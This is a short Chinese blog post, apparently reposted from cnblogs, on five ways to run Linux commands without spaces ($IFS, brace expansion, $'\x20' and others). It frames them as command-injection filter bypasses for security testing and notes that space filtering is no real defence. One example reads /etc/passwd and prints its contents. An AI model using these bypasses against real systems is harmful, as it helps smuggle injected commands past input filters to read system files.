• linux下不用空格执行带参数的5种姿势


    在做安全测试时,经常会遇到存在代码/命令执行、但输入中不能使用空格的情况,这里总结了几种绕过方法。这也说明:仅靠过滤空格并不能防住命令注入,根本的做法是不要把不可信输入拼接进 shell 命令。

    1.!!(bash 的历史展开:重复执行上一条命令,只在开启了历史展开的交互式 shell 中生效)

    1 [root@iZ28wg1kditZ tmp]# pwd
    2 /tmp
    3 [root@iZ28wg1kditZ tmp]# !!
    4 pwd
    5 /tmp
    6 [root@iZ28wg1kditZ tmp]# 

    2.$IFS(未加引号的 $IFS 默认展开为空格、制表符和换行,shell 按其分词,效果等同于空格)

     1 [root@iZ28wg1kditZ tmp]# ls$IFS-al
     2 total 40
     3 drwxrwxrwt.  8 root root     4096 Nov 17 04:18 .
     4 dr-xr-xr-x. 27 root root     4096 Nov 14 16:27 ..
     5 srwxrwxrwx   1 root root        0 Oct 12 14:37 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>
     6 -rw-r--r--   1 root root      460 Nov 14 16:27 cron.rule
     7 drwxrwxrwx   2  502 test2    4096 Nov  8 11:01 disktables
     8 -rw-rw-r--   1  501 filetest    0 Nov  8 10:58 file
     9 drwxrwxrwt   2 root root     4096 May 18  2016 .ICE-unix
    10 drwxr-xr-x   2 root root     4096 Nov 14 16:27 install_agent
    11 srwxrwxrwx   1 root root        0 Sep 22 14:45 mongodb-27017.sock
    12 srwxrwxrwx   1 root root        0 Oct 12 14:37 qtsingleapp-aegisG-46d2
    13 srwxr-x---   1 root root        0 May 18  2016 qtsingleapp-aegisG-46d2-0
    14 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d2
    15 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d2-0
    16 drwxrw-r--   2 root root     4096 Nov 16 15:57 rd4Xy6JfY9
    17 drwxr-xr-x   2 root root     4096 Nov 10 09:56 test
    18 -rw-r--r--   1 root root      477 Nov 14 16:30 tt_install_shell.log
    19 drwxrw-r--   2 root root     4096 Nov 14 16:52 XUgJsg1WK6
    20 [root@iZ28wg1kditZ tmp]# 

    3.{}(bash 的花括号展开:{ls,-al} 会展开为 ls 和 -al 两个词)

     1 [root@iZ28wg1kditZ tmp]# {ls,-al}
     2 total 40
     3 drwxrwxrwt.  8 root root     4096 Nov 17 04:18 .
     4 dr-xr-xr-x. 27 root root     4096 Nov 14 16:27 ..
     5 srwxrwxrwx   1 root root        0 Oct 12 14:37 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>
     6 -rw-r--r--   1 root root      460 Nov 14 16:27 cron.rule
     7 drwxrwxrwx   2  502 test2    4096 Nov  8 11:01 disktables
     8 -rw-rw-r--   1  501 filetest    0 Nov  8 10:58 file
     9 drwxrwxrwt   2 root root     4096 May 18  2016 .ICE-unix
    10 drwxr-xr-x   2 root root     4096 Nov 14 16:27 install_agent
    11 srwxrwxrwx   1 root root        0 Sep 22 14:45 mongodb-27017.sock
    12 srwxrwxrwx   1 root root        0 Oct 12 14:37 qtsingleapp-aegisG-46d2
    13 srwxr-x---   1 root root        0 May 18  2016 qtsingleapp-aegisG-46d2-0
    14 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d2
    15 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d2-0
    16 drwxrw-r--   2 root root     4096 Nov 16 15:57 rd4Xy6JfY9
    17 drwxr-xr-x   2 root root     4096 Nov 10 09:56 test
    18 -rw-r--r--   1 root root      477 Nov 14 16:30 tt_install_shell.log
    19 drwxrw-r--   2 root root     4096 Nov 14 16:52 XUgJsg1WK6
    20 [root@iZ28wg1kditZ tmp]# 

    4.<>(重定向操作符:以读写方式打开文件并作为标准输入,操作符两侧不需要空格)

    1 [root@iZ28wg1kditZ tmp]# vim test
    2 [root@iZ28wg1kditZ tmp]# ls
    3 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>  disktables     mongodb-27017.sock       qtsingleapp-aegisG-46d2-0  qtsingleapp-aegiss-a5d2-0  test                  XUgJsg1WK6
    4 cron.rule                                           install_agent  qtsingleapp-aegisG-46d2  qtsingleapp-aegiss-a5d2    rd4Xy6JfY9                 tt_install_shell.log
    5 [root@iZ28wg1kditZ tmp]# cat<>test 
    6 hello
    7 [root@iZ28wg1kditZ tmp]# cat test 
    8 hello
    9 [root@iZ28wg1kditZ tmp]# 

     5.\x20(bash 的 $'...' 引用会把 \x20 解释为空格字符)

     1 [root@iZ28wg1kditZ ~]# CMD=$'\x20/etc/passwd'&&cat$CMD
     2 root:x:0:0:root:/root:/bin/bash
     3 bin:x:1:1:bin:/bin:/sbin/nologin
     4 daemon:x:2:2:daemon:/sbin:/sbin/nologin
     5 adm:x:3:4:adm:/var/adm:/sbin/nologin
     6 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
     7 sync:x:5:0:sync:/sbin:/bin/sync
     8 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
     9 halt:x:7:0:halt:/sbin:/sbin/halt
    10 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    11 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    12 operator:x:11:0:operator:/root:/sbin/nologin
    13 games:x:12:100:games:/usr/games:/sbin/nologin
    14 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    15 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    16 nobody:x:99:99:Nobody:/:/sbin/nologin
    17 dbus:x:81:81:System message bus:/:/sbin/nologin
    18 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    19 abrt:x:173:173::/etc/abrt:/sbin/nologin
    20 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    21 ntp:x:38:38::/etc/ntp:/sbin/nologin
    22 saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
    23 postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    24 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    25 tcpdump:x:72:72::/:/sbin/nologin
    26 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    27 apache:x:48:48:Apache:/var/www:/sbin/nologin
    28 mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
  • 原文地址:https://www.cnblogs.com/sevck/p/6072721.html